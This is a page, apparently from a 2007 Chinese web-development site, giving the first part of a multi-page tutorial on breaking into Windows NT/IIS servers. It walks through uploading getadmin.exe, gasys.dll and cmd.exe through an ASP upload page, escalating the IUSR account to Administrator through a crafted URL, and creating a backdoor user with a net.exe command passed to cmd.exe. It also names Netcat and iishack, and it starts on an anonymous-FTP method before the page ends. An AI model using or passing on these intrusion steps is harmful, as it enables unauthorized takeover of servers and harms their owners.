WEB开发网
开发学院操作系统windows 2008 操作Windows NT的Administrator权限 阅读

操作Windows NT的Administrator权限

 2007-05-07 12:22:43 来源:WEB开发网   
核心提示: 1、如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,操作Windows NT的Administrator权限(2),都可以获得root,2、用Netcat和iishack可以获得root,然后:http://www.xxx.com/scripts/getadmin.exe?

1、如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得root。

2、用Netcat和iishack可以获得root。

3、Iusr_计算机名这个帐号有ftp上传,web执行等权限。

4、在Web server上执行程序是入侵NT的关键。

5、要在Web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去。

在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号。

第一个方法、用Iusr_ntsvr2后者Guest这两个帐号

这里假设我们已经破解了这个帐号的密码,在浏览器输入:

http://www.xxx.com/scripts/uploadn.asp

guest和iusr_ntsvr2这两个帐号都可以进这个asp页面,在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录。

然后输入:

http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2

大约十多秒后屏幕显示:

CGI Error

这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。

下面可以Add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32
et.exe%20user%20china%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:

http://www.xxx.com/scripts/getadmin.exe?china

第二个方法、用匿名Ftp

如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):

上一页  1 2 3 4  下一页

Tags:操作 Windows NT

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接